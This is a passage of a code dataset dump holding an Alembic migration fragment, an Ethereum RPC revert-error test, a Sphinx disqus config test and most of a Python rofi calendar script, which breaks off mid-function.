'9f257b57fca6'\ndown_revision = '8a1caca53d6c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.drop_table('pure_org')\n\ndef downgrade():\n op.create_table(\n 'pure_org',\n sa.Column('id', sa.VARCHAR(length=50), nullable=False),\n sa.Column('type', sa.VARCHAR(length=25), nullable=True),\n sa.Column('name_en', sa.VARCHAR(length=255), nullable=True),\n sa.Column('level', oracle.NUMBER(scale=0, asdecimal=False), nullable=False),\n sa.Column('lft', oracle.NUMBER(scale=0, asdecimal=False), nullable=False),\n sa.Column('rgt', oracle.NUMBER(scale=0, asdecimal=False), nullable=False),\n sa.Column('parent_id', sa.VARCHAR(length=50), nullable=True),\n sa.Column('tree_id', oracle.NUMBER(scale=0, asdecimal=False), nullable=True),\n sa.Column('pure_id', sa.VARCHAR(length=50), nullable=False),\n sa.ForeignKeyConstraint(['parent_id'], ['pure_org.id'], name='SYS_C00281952'),\n sa.PrimaryKeyConstraint('id', name='sys_c00281951')\n )\n","repo_name":"UMNLibraries/experts_dw","sub_path":"alembic/versions/9f257b57fca6_removing_pure_org_so_i_can_re_create_it_.py","file_name":"9f257b57fca6_removing_pure_org_so_i_can_re_create_it_.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"30202722658","text":"import pytest\n\nfrom eth_web3._utils.method_formatters import (\n get_error_formatters,\n raise_solidity_error_on_revert,\n)\nfrom eth_web3._utils.rpc_abi import (\n RPC,\n)\nfrom eth_web3.exceptions import (\n ContractLogicError,\n)\nfrom eth_web3.types import (\n RPCResponse,\n)\n\n# OpenEthereum/default case:\nREVERT_WITH_MSG = RPCResponse(\n {\n \"jsonrpc\": \"2.0\",\n \"error\": {\n \"code\": -32015,\n \"message\": \"VM execution error.\",\n \"data\": (\n \"Reverted \"\n \"0x08c379a\"\n \"00000000000000000000000000000000000000000000000000000000000000020\"\n \"0000000000000000000000000000000000000000000000000000000000000016\"\n \"6e6f7420616c6c6f77656420746f206d6f6e69746f7200000000000000000000\"\n ),\n },\n \"id\": 2987,\n }\n)\n\nREVERT_WITHOUT_MSG = RPCResponse(\n {\n \"jsonrpc\": \"2.0\",\n \"error\": {\n \"code\": -32015,\n \"message\": \"VM execution error.\",\n \"data\": \"Reverted 0x\",\n },\n \"id\": 2987,\n }\n)\n\nOTHER_ERROR = RPCResponse(\n {\n \"jsonrpc\": \"2.0\",\n \"error\": {\n \"code\": -32601,\n \"message\": \"Method not found\",\n },\n \"id\": 1,\n }\n)\n\nGETH_RESPONSE = RPCResponse(\n {\n \"jsonrpc\": \"2.0\",\n \"id\": 2,\n \"error\": {\n \"code\": 3,\n \"message\": \"execution reverted: Function has been reverted.\",\n \"data\": (\n \"0x08c379a0000000000000000000000000000000000000000000000\"\n \"0000000000000000020000000000000000000000000000000000000\"\n \"000000000000000000000000001b46756e6374696f6e20686173206\"\n \"265656e2072657665727465642e0000000000\"\n ),\n },\n }\n)\n\nGANACHE_RESPONSE = RPCResponse(\n {\n \"id\": 24,\n \"jsonrpc\": \"2.0\",\n \"error\": {\n \"message\": \"VM Exception while processing transaction: revert Custom revert message\", # noqa: E501\n \"code\": -32000,\n \"data\": {\n \"stack\": \"o: VM Exception while processing transaction: revert Custom revert message\\n\", # noqa: E501\n \"name\": \"o\",\n },\n },\n }\n)\n\n\n@pytest.mark.parametrize(\n \"response,expected\",\n (\n (REVERT_WITH_MSG, \"execution reverted: not allowed to monitor\"),\n (REVERT_WITHOUT_MSG, \"execution reverted\"),\n (GETH_RESPONSE, \"execution reverted: Function has been reverted.\"),\n (\n GANACHE_RESPONSE,\n \"execution reverted: VM Exception while processing 
transaction: revert Custom revert message\", # noqa: 501\n ),\n ),\n ids=[\n \"test-get-revert-reason-with-msg\",\n \"test-get-revert-reason-without-msg\",\n \"test-get-geth-revert-reason\",\n \"test_get-ganache-revert-reason\",\n ],\n)\ndef test_get_revert_reason(response, expected) -> None:\n with pytest.raises(ContractLogicError, match=expected):\n raise_solidity_error_on_revert(response)\n\n\ndef test_get_revert_reason_other_error() -> None:\n assert raise_solidity_error_on_revert(OTHER_ERROR) is OTHER_ERROR\n\n\ndef test_get_error_formatters() -> None:\n formatters = get_error_formatters(RPC.eth_call)\n with pytest.raises(ContractLogicError, match=\"not allowed to monitor\"):\n formatters(REVERT_WITH_MSG)\n with pytest.raises(ContractLogicError):\n formatters(REVERT_WITHOUT_MSG)\n assert formatters(OTHER_ERROR) == OTHER_ERROR\n","repo_name":"Foundation-Eth/eth-web3","sub_path":"tests/core/utilities/test_method_formatters.py","file_name":"test_method_formatters.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"94"} +{"seq_id":"3845976223","text":"\"\"\"Test disqus_shortname config value scenarios.\"\"\"\n\nimport re\n\nimport py\nimport pytest\nfrom _pytest.monkeypatch import MonkeyPatch\nfrom docutils.parsers.rst import directives, roles\nfrom sphinx import application, errors\n\nBASE_CONFIG = \"\"\"\\\nimport sys\nsys.path.append('{}')\nextensions = ['sphinx_disqus.disqus']\nmaster_doc = 'index'\nnitpicky = True\n\"\"\"\n\nPARAMS = [\n (\"disqus_shortname = 'good'\", \"\"),\n (\"\", \"disqus_shortname config value must be set for the disqus extension to work.\"),\n (\"disqus_shortname = ''\", \"disqus_shortname config value must be set for the disqus extension to work.\"),\n (\"disqus_shortname = 'B@D'\", \"disqus_shortname config value must be 3-50 letters, numbers, and hyphens only.\"),\n]\n\n\n@pytest.mark.parametrize(\"tail,expected_error\", PARAMS)\ndef test(monkeypatch: MonkeyPatch, tmpdir: py.path.local, tail: str, expected_error: str):\n \"\"\"Test valid and invalid values.\"\"\"\n tmpdir.join(\"conf.py\").write(BASE_CONFIG.format(py.path.local(__file__).join(\"..\", \"..\")))\n tmpdir.join(\"conf.py\").write(tail, mode=\"a\")\n tmpdir.join(\"index.rst\").write(\"====\\nMain\\n====\\n\\n.. toctree::\\n :maxdepth: 2\\n.. 
disqus::\")\n monkeypatch.setattr(directives, \"_directives\", getattr(directives, \"_directives\").copy())\n monkeypatch.setattr(roles, \"_roles\", getattr(roles, \"_roles\").copy())\n\n srcdir = confdir = str(tmpdir)\n outdir = tmpdir.join(\"_build\", \"html\")\n doctreedir = outdir.join(\"doctrees\").ensure(dir=True, rec=True)\n app = application.Sphinx(srcdir, confdir, str(outdir), str(doctreedir), \"html\")\n\n if not expected_error:\n app.builder.build_all()\n html_body = outdir.join(\"index.html\").read()\n disqus_div = re.findall(r'(]+ id=\"disqus_thread\"[^>]*>)', html_body)[0]\n assert 'data-disqus-shortname=\"good\"' in disqus_div\n return\n\n with pytest.raises(errors.ExtensionError) as exc:\n app.builder.build_all()\n assert expected_error == exc.value.args[0]\n","repo_name":"Robpol86/sphinx-disqus","sub_path":"tests/unit_tests/test_shortname.py","file_name":"test_shortname.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"94"} +{"seq_id":"33190941440","text":"#!/usr/bin/env python3\n\"\"\"\nA simple calendar made with rofi and python3.\n\nCycle through month and create linked event to days.\n\"\"\"\n\n__author__ = \"Daguhh\"\n__license__ = \"MIT-0\"\n__status__ = \"Released\"\n__version__ = \"2.0.1\"\n\nimport glob, os, sys, subprocess, shutil\nfrom pathlib import Path\nimport re, argparse, configparser\nimport datetime, calendar, locale\nfrom itertools import chain\nfrom functools import wraps\nimport time\n\n#START = time.time()\n\ndef get_arguments():\n \"\"\"Parse command line arguments\n\n Returns\n -------\n args : argparse.Namespace\n command line arguments\n unknown : str\n rofi output\n \"\"\"\n\n parser = argparse.ArgumentParser(\n prog=\"naivecalendar\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''A simple popup calendar\n\nsubcommands:\n update-themes Update a calendar parameter for all user themes at once\n add-event Add, modify, delete event in all user themes config at once\n configure Clone or open configuration files'''\n )\n\n parser.add_argument(\n '-V',\n '--version',\n action='version',\n version=\"%(prog)s \" + __version__\n )\n\n parser.add_argument(\n '-v',\n '--verbose',\n help=\"direct rofi error to stdout\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-p\",\n \"--print\",\n help=\"print date to stdout instead of opening a event\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-x\",\n \"--clipboard\",\n help=\"copy date to clipboard\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-f\",\n \"--format\",\n help=\"\"\"option '-p' or '-x' output format (datetime.strftime format, defaut='%%Y-%%m-%%d')\"\"\",\n dest=\"format\",\n default=\"%Y-%m-%d\",\n )\n\n parser.add_argument(\n \"-e\",\n \"--editor\",\n help=\"\"\"editor command to open events\"\"\",\n dest=\"editor\",\n default=\"xdg-open\",\n )\n\n parser.add_argument(\n \"-l\",\n \"--locale\",\n help=\"\"\"force system locale, for example '-l es_ES.utf8'\"\"\",\n dest=\"locale\",\n default=\"\",\n )\n\n parser.add_argument(\n \"-c\",\n \"--read-cache\",\n dest=\"is_force_read_cache\",\n action=\"store_true\",\n help=\"\"\"force calendar to read old date from cache\"\"\"\n )\n\n parser.add_argument(\n \"-t\",\n \"--theme\",\n help=\"\"\"set calendar theme, default=classic_dark_extended (theme file name without extention)\"\"\",\n dest=\"theme\",\n default=False\n )\n\n parser.add_argument(\n \"-d\",\n \"--date\",\n help=\"\"\"display calendar at 
the given month, format='%%m-%%Y'\"\"\",\n dest=\"date\",\n default=False\n )\n\n args, unknown = parser.parse_known_args()\n unknown = unknown if len(unknown) == 0 else \"\".join(unknown).strip(' ')\n\n return args, unknown\n\n\n# get command line arguments and if exist : rofi output\nARGS, ROFI_OUTPUT = get_arguments()\n\n# Global var :\nEMPTY = -1\nROFI_RELOAD_TEMPO = 0.2\n\n######################\n### Path constants ###\n######################\nHOME = Path.home()\nDIRNAME = Path(__file__).parent.absolute()\n\n# cache files\nCACHE_PATH = HOME / \".cache/naivecalendar\"\nDATE_CACHE = CACHE_PATH / \"date_cache.ini\"\nPP_CACHE = CACHE_PATH / \"pretty_print_cache.txt\"\nTHEME_CACHE = CACHE_PATH / \"theme_cache.txt\"\nEVENT_CACHE = CACHE_PATH / \"event_cache.txt\"\n\n# config files\nCONFIG_PATH = HOME / \".config/naivecalendar\"\n\nTHEME_PATHS = {\n 'user' : CONFIG_PATH / \"themes\",\n 'rel' : DIRNAME / \"themes\"\n}\nSCRIPT_PATHS = {\n 'user' : CONFIG_PATH / \"scripts\",\n 'rel' : DIRNAME / \"scripts\"\n}\nEVENT_FILES = {\n 'user' : CONFIG_PATH / \"global/events.cfg\",\n 'rel' : DIRNAME / \"global/events.cfg\"\n}\nCUSTOM_ACTION_FILES = {\n 'user' : CONFIG_PATH / \"global/custom_actions.cfg\",\n 'rel' : DIRNAME / \"global/custom_actions.cfg\"\n}\n\n\n#######################################\n### load a theme configuration file ###\n#######################################\n\n# get wanted theme\ntheme = \"classic_dark_extended\"\nif ARGS.theme:\n theme = ARGS.theme\nelse:\n if THEME_CACHE.exists():\n with open(THEME_CACHE, 'r') as theme_cache:\n theme = theme_cache.read()\n\n# look for theme in config paths\nif (THEME_PATHS['user'] / f\"{theme}.cfg\").exists():\n theme_path = THEME_PATHS['user']\nelse:\n theme_path = THEME_PATHS['rel']\n\nTHEME_CONFIG_FILE = theme_path / f\"{theme}.cfg\"\nTHEME_RASI_FILE = theme_path / f\"{theme}.rasi\"\n\n\n########################\n### Load config file ###\n########################\n# -T-heme config\ncfg_t = configparser.ConfigParser(interpolation=None)\ncfg_t.read(THEME_CONFIG_FILE)\n\n# -E-vent config\ncfg_e = configparser.ConfigParser(interpolation=None)\nif EVENT_FILES['user'].exists():\n cfg_e.read(EVENT_FILES['user'])\nelif EVENT_FILES['rel'].exists():\n cfg_e.read(EVENT_FILES['rel'])\nelse:\n cfg_e['EVENTS'] = {'Notes' : '.naivecalendar_events/MyNotes/note_%Y-%m-%d.txt'}\n\n# custom -A-ction config\ncfg_a = configparser.ConfigParser(interpolation=None)\nif CUSTOM_ACTION_FILES['user'].exists():\n cfg_a.read(CUSTOM_ACTION_FILES['user'])\nelse:\n cfg_a.read(CUSTOM_ACTION_FILES['rel'])\n\n\n###########################\n### Get last event type ###\n###########################\ntry:\n with open(EVENT_CACHE, 'r') as event_cache:\n EVENTS_DEFAULT = event_cache.read()\n try :\n cfg_e['EVENTS'][EVENTS_DEFAULT]\n except KeyError:\n #print(f'no event \"{EVENTS_DEFAULT}\" found', file=sys.stderr)\n EVENTS_DEFAULT = ''\nexcept FileNotFoundError:\n #print(f'no event file \"{EVENT_CACHE}\" found', file=sys.stderr)\n EVENTS_DEFAULT = ''\n\n############################\n### Load user parameters ###\n############################\n\n# Some Functions\n################\n# Functions to parse list and int from configparser\ndef strip_list(lst):\n \"\"\"strip all element in a list\"\"\"\n return [x.strip() for x in lst]\n\ndef to_list(cfg_list):\n \"\"\"convert string with comma separated elements into python list\"\"\"\n # align all elements to right\n return [DAY_FORMAT.format(word) for word in cfg_list.split(',')]\n\ndef set_list(default, section, key, row):\n \"\"\"set, 
set default, or deactivate the given user config."""\n    vals = section[key]\n    if row == EMPTY: # don't display row\n        return []\n    elif vals == '': # use default vals\n        return [DAY_FORMAT.format(s) for s in default]\n    elif key == 'SYMS_DAYS_NUM':\n        return to_list(vals)\n    else: # parse config values\n        return [CONTROL_MENU_ID[x.strip()] if x.strip() in CONTROL_MENU_ID.keys() else x for x in to_list(vals)]\n\n# def old_conf_file_compat(key):\n#     dct = {\n#         'ROW_CONTROL_MENU' : 'ROW_BAR_1',\n#         'ROW_SHORTCUTS' : 'ROW_BAR_2',\n#         'SYMS_CONTROL_MENU' : 'SYMS_BAR_1',\n#         'SYMS_SHORTCUTS' : 'SYMS_BAR_2'\n#     }\n#\n#     return dct.setdefault(key, key)\n\ndef to_int(section, key):\n    \"\"\"Convert a configparser entry into an int\"\"\"\n    val = section[key]\n    if val == '':\n        val = EMPTY\n    else:\n        try:\n            val = int(val)\n        except ValueError as e:\n            print(40*'*'+f\"\\nwarning : wrong value '{val}' for '{key}'.\\nShould be an integer or an empty value.\\n\"+40*'*', file=sys.stderr)\n            raise e\n    return val\n\ndef to_path(path_str, parent=HOME):\n    \"\"\"make path relative to home or absolute\"\"\"\n\n    path = Path(path_str)\n\n    if path.is_absolute():\n        return path\n    else:\n        return parent / path\n\n# week day symbols : can be changed by locale\ndef set_locale_n_week_day_names(arg_locale, user_locale, day_format, first_day_week, day_abbr_lenght):\n    \"\"\" Set SYMS_WEEK_DAYS constant given command line argument \"\"\"\n\n    if arg_locale: # locale overridden by user\n        locale.setlocale(locale.LC_ALL, arg_locale)\n    else: # system locale\n        locale.setlocale(locale.LC_ALL, user_locale)\n\n    def get_loc_day(day_num, lenght):\n        \"\"\"return locale day name truncated at lenght and title-cased\"\"\"\n        return locale.nl_langinfo(locale.DAY_1 + day_num)[:lenght].title()\n\n    days_order = chain(range(first_day_week, 7), range(0, first_day_week))\n\n    sym_week_days = [day_format.format(\n        get_loc_day(day_num, day_abbr_lenght)\n    ) for day_num in days_order]\n\n    return sym_week_days\n\n# Configure locale\n###################\nUSER_LOCALE = cfg_t['LOCALE'][\"USER_LOCALE\"] # use 'locale -a' on your system to list locales\n\n# Day names abbreviations\n#########################\nDAY_ABBR_LENGHT = int(cfg_t['DAY NAMES'][\"DAY_ABBR_LENGHT\"]) # ex : 3 => Mon\nDAY_FORMAT = '{:>' + str(max(DAY_ABBR_LENGHT,2)) + '}' # align symbols right\nFIRST_DAY_WEEK = int(cfg_t['DAY NAMES'][\"FIRST_DAY_WEEK\"]) # 0 = sunday, 1 = monday...\n\n# Day events configuration\n##########################\nEVENTS_PATHS = {n:to_path(cfg_e['EVENTS'][n]) for n in cfg_e['EVENTS']}\n# default date events folder to display\nEVENTS_DEFAULT = EVENTS_DEFAULT if EVENTS_DEFAULT != '' else next(EVENTS_PATHS.keys().__iter__()) #cfg['DEFAULT'].lower()\n\n# Rofi/Calendar shape\n#####################\nNB_COL = 7\nNB_WEEK = 6 # nb row of calendar \"days number\" part\n#NB_ROW = int(cfg_t['SHAPE']['NB_ROW'])\n\n# Calendar symbols and shortcuts\n################################\nSYM_NEXT_MONTH = to_list(cfg_t['CONTROL']['SYM_NEXT_MONTH'])\nSYM_NEXT_YEAR = to_list(cfg_t['CONTROL']['SYM_NEXT_YEAR'])\nSYM_PREV_MONTH = to_list(cfg_t['CONTROL']['SYM_PREV_MONTH'])\nSYM_PREV_YEAR = to_list(cfg_t['CONTROL']['SYM_PREV_YEAR'])\n\n# Shortcuts for popup windows\n#############################\nSYM_SHOW_EVENTS = to_list(cfg_t['SHORTCUTS']['SYM_SHOW_EVENTS'])\nSYM_SHOW_HELP = to_list(cfg_t['SHORTCUTS']['SYM_SHOW_HELP'])\nSYM_SWITCH_THEME = to_list(cfg_t['SHORTCUTS']['SYM_SWITCH_THEME'])\nSYM_SWITCH_EVENT = to_list(cfg_t['SHORTCUTS']['SYM_SWITCH_EVENT'])\nSYM_SHOW_MENU = 
to_list(cfg_t['SHORTCUTS']['SYM_SHOW_MENU'])\nSYM_GO_TODAY = to_list(cfg_t['SHORTCUTS']['SYM_GO_TODAY'])\n\n# Custom Functions\n##################\nCUSTOM_ACTIONS = {s:{'sym':to_list(cfg_a[s]['sym']), 'cmd':to_list(cfg_a[s]['cmd'])} for s in cfg_a.sections()}\n\n# Today header display\n######################\nPROMT_DATE_FORMAT = cfg_t['HEADER']['PROMT_DATE_FORMAT']\nIS_TODAY_HEAD_MSG = cfg_t.getboolean('HEADER', 'IS_TODAY_HEAD_MSG')\nIS_LOOP_TODAY_HEAD_MSG = cfg_t.getboolean('HEADER', 'IS_LOOP_TODAY_HEAD_MSG')\n\n# pango markup props\nTODAY_HEAD_MSG_TXT = cfg_t['HEADER']['TODAY_HEAD_MSG_TXT']\n\n# Calendar content and organisation\n###################################\n# row number where to display day symbols\nROW_DAY_NAMES = to_int(cfg_t['CONTENT'], 'ROW_DAY_NAMES')\n# symbols for week day names\n#_syms_week_days = to_list(cfg_t['CONTENT'][\"SYMS_WEEK_DAYS\"]) if not ROW_DAY_NAMES == EMPTY else []\nSYMS_WEEK_DAYS = set_locale_n_week_day_names(ARGS.locale, USER_LOCALE, DAY_FORMAT, FIRST_DAY_WEEK, DAY_ABBR_LENGHT)\n\n# row number where to display calendar first line\nROW_CAL_START = to_int(cfg_t['CONTENT'], 'ROW_CAL_START')\n# symbols for day numbers\n#default = (str(x) for x in range(1,32))\n#SYMS_DAYS_NUM= set_list(default, cfg_t['CONTENT'], 'SYMS_DAYS_NUM', ROW_CAL_START)\nSYMS_DAYS_NUM = [str(x) for x in range(1,32)]\n\n\nCONTROL_MENU_ID = {\n 'p' : SYM_PREV_MONTH[0],\n 'pp': SYM_PREV_YEAR[0],\n 'n' : SYM_NEXT_MONTH[0],\n 'nn': SYM_NEXT_YEAR[0],\n 'h' : SYM_SHOW_HELP[0],\n 't' : SYM_SWITCH_THEME[0],\n 'e' : SYM_SHOW_EVENTS[0],\n 's' : SYM_SWITCH_EVENT[0],\n 'm' : SYM_SHOW_MENU[0],\n 'bb': SYM_GO_TODAY[0],\n **{s:v['sym'][0] for s,v in CUSTOM_ACTIONS.items()}\n}\n\n# row number where to display buttons\nROW_BAR_1 = to_int(cfg_t['CONTENT'], 'ROW_BAR_1')\n# symbols for control menu row\ndefault = (s[0] for s in (SYM_PREV_YEAR, SYM_PREV_MONTH, ' ', SYM_SHOW_MENU, ' ', SYM_NEXT_MONTH, SYM_NEXT_YEAR))\nSYMS_BAR_1 = set_list(default, cfg_t['CONTENT'], 'SYMS_BAR_1', ROW_BAR_1)\n\n# row number where to display shortcuts buttons\nROW_BAR_2 = to_int(cfg_t['CONTENT'], 'ROW_BAR_2')\n# symbols to display in shortcuts row\ndefault = (s[0] for s in (SYM_SHOW_HELP, SYM_SWITCH_THEME, SYM_SHOW_EVENTS, SYM_SWITCH_EVENT, ' ', ' ', SYM_SHOW_MENU))\nSYMS_BAR_2 = set_list(default, cfg_t['CONTENT'], 'SYMS_BAR_2', ROW_BAR_2)\n\nNB_ROW = int(bool(SYMS_BAR_2)) + int(bool(SYMS_BAR_1)) + int(bool(SYMS_WEEK_DAYS)) + 6\n\n##############\n### Script ###\n##############\n\ndef main(args, rofi_output):\n \"\"\"Print calendar to stdout and react to rofi output\"\"\"\n\n # create event path n test rofi intall\n first_time_init()\n\n is_first_loop = not bool(rofi_output)\n if isinstance(rofi_output, str):\n out = DAY_FORMAT.format(rofi_output) # rofi strip blank character so reformat\n else:\n out = 'Nothing'\n\n cdate = CacheDate() # manage operation and writing to cache\n cdate = set_date(cdate, is_first_loop, args.is_force_read_cache, args.date)\n cdate, is_match = process_event_date(cdate, out, args)\n\n update_rofi(cdate.date, is_first_loop)\n cdate.write_cache()\n if not is_match: # don't test if out already match one condition in process_event_date\n process_event_popup(out, cdate)\n\n\ndef set_date(cdate, is_first_loop, is_force_read_cache, arg_date):\n \"\"\"set date given context\n\n (read cache, get today date or set date argument)\n\n Parameters\n ----------\n is_first_loop : bool\n true on first calendar call\n is_force_read_cache : bool\n force date from cache\n arg_date : str\n date in '%m%Y' format\n\n 
Returns\n -------\n CacheDate\n CacheDate object that contain the date to display\n \"\"\"\n\n if not is_first_loop or is_force_read_cache:\n cdate.read_cache() # read previous date\n elif is_first_loop and arg_date:\n cdate.set_month(arg_date) # command line force date\n else: # at first loop if no force option\n cdate.now()\n\n return cdate\n\n\ndef process_event_date(cdate, out, args):\n \"\"\"React to rofi output for \"date\" events\n\n Parameters\n ----------\n cdate : CacheDate\n current month\n out : str\n rofi output\n args : argparse.Namespace\n print, clipboard, format, editor arguments\n\n Returns\n -------\n CacheDate\n new month to display\n \"\"\"\n\n is_match = True\n out = out.strip()\n if out in strip_list(SYM_PREV_YEAR):\n cdate.year -= 1\n elif out in strip_list(SYM_PREV_MONTH):\n cdate.month -= 1\n elif out in strip_list(SYM_NEXT_MONTH):\n cdate.month += 1\n elif out in strip_list(SYM_NEXT_YEAR):\n cdate.year += 1\n elif out in strip_list(SYMS_DAYS_NUM):\n set_pp_date(out, cdate.date, args.format)\n if args.print or args.clipboard:\n sys.exit(0)\n else:\n open_event(out, cdate.date, args.editor)\n elif out in strip_list(SYM_GO_TODAY):\n cdate.now()\n else:\n is_match = False\n\n return cdate, is_match\n\n\ndef process_event_popup(out, cdate):\n \"\"\"React to rofi event hat open a popup window\n\n Parameters\n ----------\n out : str\n rofi output\n cdate : CacheDate\n current month\n \"\"\"\n\n out = out.strip()\n if out in strip_list(SYM_SHOW_EVENTS):\n show_events(cdate.date)\n elif out in strip_list(SYM_SHOW_HELP):\n display_help()\n elif out in strip_list(SYM_SWITCH_THEME):\n ask_theme()\n elif out in strip_list(SYM_SWITCH_EVENT):\n ask_event_to_display()\n elif out in strip_list(SYM_SHOW_MENU):\n show_menu(cdate)\n elif out in strip_list(SYM_GO_TODAY):\n cdate.now()\n cdate.write_cache()\n else:\n for sym_act, cmd_act in ((act['sym'], act['cmd']) for act in CUSTOM_ACTIONS.values()):\n if out in strip_list(sym_act):\n execute_external_cmd(cmd_act)\n break\n\n\ndef update_rofi(date, is_first_loop):\n \"\"\"generate and send calendar data to stdout/rofi\n\n It use the rofi `custom script mode `_ to communicate with rofi\n and `pango markup `_ for theming\n\n Parameters\n ----------\n date : datetime.date\n A day of the month to display\n is_first_loop : bool\n True on first loop, if true, update today highlights\n \"\"\"\n\n date_prompt = date.strftime(PROMT_DATE_FORMAT).title()\n print(f\"\\0prompt\\x1f{date_prompt}\\n\")\n\n events_inds = get_month_events_ind(date)\n print(f\"\\0urgent\\x1f{events_inds}\\n\")\n\n if is_first_loop or IS_LOOP_TODAY_HEAD_MSG:\n today_ind = cal2rofi_ind(date.day, date.month, date.year)\n print(f\"\\0active\\x1f{today_ind}\\n\")\n if IS_TODAY_HEAD_MSG:\n msg = date.strftime(TODAY_HEAD_MSG_TXT)\n print(f\"\\0message\\x1f{msg}\\n\")\n\n if not ROW_DAY_NAMES == EMPTY:\n week_sym_row = get_row_rofi_inds(ROW_DAY_NAMES)\n print(f\"\\0active\\x1f{week_sym_row}\\n\")\n\n if not ROW_BAR_1 == EMPTY:\n control_sym_row =get_row_rofi_inds(ROW_BAR_1)\n print(f\"\\0active\\x1f{control_sym_row}\\n\")\n\n if not ROW_BAR_2 == EMPTY:\n shortcut_sym_row = get_row_rofi_inds(ROW_BAR_2)\n print(f\"\\0active\\x1f{shortcut_sym_row}\\n\")\n\n cal = get_calendar_from_date(date)\n print(cal)\n\n\ndef get_calendar_from_date(date):\n r\"\"\"Return a montly calendar given date\n\n Calendar is a string formated to be shown by rofi (i.e. 
column bu column)::\n\n L M M J V S D\n 1\n 2 3 4 5 6 7 8\n date -> 9 10 11 12 13 14 15 -> 'L\\n \\n2\\n9\\n16\\n23\\n30\\n<\\nM\\n \\n3\\n10\\n17\\n24\\n...'\n 16 17 18 19 20 21 22\n 23 24 25 26 27 28 29\n 30\n\n Parameters\n ----------\n date : datetime.date\n Any day of the month to display\n\n Returns\n -------\n str\n A str that contain chained columns of a calendar in a rofi format\n\n \"\"\"\n\n start_day, month_length = calendar.monthrange(date.year, date.month)\n\n # init calendar with NB_WEEK blank week\n cal = [\" \"] * NB_WEEK * NB_COL\n\n # fill with day numbers\n ind_first_day = (start_day - (FIRST_DAY_WEEK - 1)) % 7\n ind_last_day = ind_first_day + month_length\n cal[ind_first_day : ind_last_day] = SYMS_DAYS_NUM[:month_length]\n\n # join calendar parts given user order\n index = (ROW_DAY_NAMES, ROW_CAL_START, ROW_BAR_1, ROW_BAR_2)\n content = [SYMS_WEEK_DAYS, cal, SYMS_BAR_1, SYMS_BAR_2]\n index, content = (list(x) for x in zip(*sorted(zip(index, content))))\n\n # transform\n cal = list(chain(*content)) # row-by-row list\n cal = list_transpose(cal) # col-by-col list\n cal = list2rofi(cal) # rofi formated\n\n return cal\n\n\ndef list_transpose(lst, col_nb=NB_COL):\n \"\"\"\n Transpose (math) a row by row list into column by column list\n given column number\n\n Parameters\n ----------\n lst : list\n row by row elements\n col_nb : int\n number of column to display\n\n Returns\n -------\n list\n A list that represent column by column elements\n\n Examples\n --------\n >>> my_list = [1,2,3,4,5,6]\n >>> list_transpose(my_list, col_nb=3)\n [1,4,2,5,3,6]\n\n \"\"\"\n\n # split into row\n iter_col = range(len(lst) // col_nb)\n row_list = [lst[i * col_nb : (i + 1) * col_nb] for i in iter_col]\n\n # transpose : take 1st element for each row, then 2nd...\n iter_row = range(len(row_list[0]))\n col_list = [[row[i] for row in row_list] for i in iter_row]\n\n # chain columns\n lst = list(chain(*col_list))\n\n return lst\n\n\ndef list2rofi(datas):\n \"\"\"\n Convert python list into a list formatted for rofi\n\n Parameters\n ----------\n datas : list\n elements stored in a list\n\n Returns\n -------\n str\n elements separated by line-breaks\n\n Examples\n --------\n\n >>> my_list = [1,2,3,4,5,6]\n >>> list2rofi(my_list]\n \"1\\\\n2\\\\n3\\\\n4\\\\n5\\\\n6\"\n \"\"\"\n\n return \"\\n\".join(datas)\n\n\ndef rofi2list(datas):\n \"\"\"\n Convert list formatted for rofi into python list object\n\n Parameters\n ----------\n datas : str\n a string with element separeted by line-breaks\n\n Returns\n -------\n list\n elements of datas in a list\n\n Examples\n --------\n\n >>> rofi_list = \"1\\\\n2\\\\n3\\\\n4\\\\n5\\\\n6\"\n >>> rofi2list\n [1,2,3,4,5,6]\n \"\"\"\n\n return datas.split(\"\\n\")\n\n\ndef parse_month_events_files(date):\n \"\"\"\n Return a list of file's first line of a specific month\n\n Parameters\n ----------\n date : datetime.date\n Any day of the month to display\n\n Returns\n -------\n str\n A rofi formatted list of month's events first line\n str\n Rows to highlight (date header)\n \"\"\"\n\n # paths\n events_paths = get_month_events(date)\n\n if not events_paths:\n return \"No events this month\", 0\n else:\n # first line\n heads = [parse_event_file(n) for n in events_paths]\n # file name\n prompts = [Path(n).stem for n in events_paths]\n # sort by file name (usually by date)\n prompts, heads = (list(x) for x in zip(*sorted(zip(prompts, heads))))\n\n prompts_pos = [0]\n for head in heads[:-1]:\n prompts_pos += [prompts_pos[-1] + len(head.split('\\n'))]\n prompts_pos = 
','.join(str(x) for x in prompts_pos)\n\n # return : : for each event\n text = \"\\n\".join([f\"{p} : {h}\" for p, h in sorted(zip(prompts, heads))])\n\n return text, prompts_pos\n\n\ndef parse_event_file(event_path):\n \"\"\"Parse event file for compact display\n\n **Event format:**\n\n - Section ::\n\n [9H30] rdv with truc <---- will be displayed\n Some text\n Some text again\n [14H30] rdv with muche <----- will be displayed\n Some text again again\n\n - header ::\n\n # Note Title <---- only first line is displayed\n Some text\n Some text again...\n\n Parameters\n ----------\n event_path : str\n A text file path\n\n Returns\n -------\n str\n Parsed lines\n \"\"\"\n\n with open(event_path, \"r\") as f:\n note_txt = f.read()\n\n # get lines with [section]\n head = list(re.findall('\\[.*\\].*', note_txt))\n\n if head: # if sections\n return '\\n' + '\\n'.join(head) # join them into multilines\n else: # otherwise\n return '\\n' + note_txt.split(\"\\n\")[0] # get first line\n\n\ndef get_row_rofi_inds(row):\n \"\"\"Get all rofi index of a row\n\n Parameters\n ----------\n row : int\n row number (start at 0)\n\n Returns\n -------\n str\n a ',' separate list of rofi indexes\n \"\"\"\n\n return \",\".join(str(i * NB_ROW + row) for i in range(NB_COL))\n\n\n\ndef cal2rofi_ind(day, month, year):\n \"\"\"\n Convert calendar date into coordinates for rofi\n\n Parameters\n ----------\n day : int\n A day number (1-31)\n month : int\n A month number (1-12)\n year : int\n A year number\n\n Returns\n -------\n int\n A rofi index\n \"\"\"\n\n # day number area offset in calendar\n cal_offset = 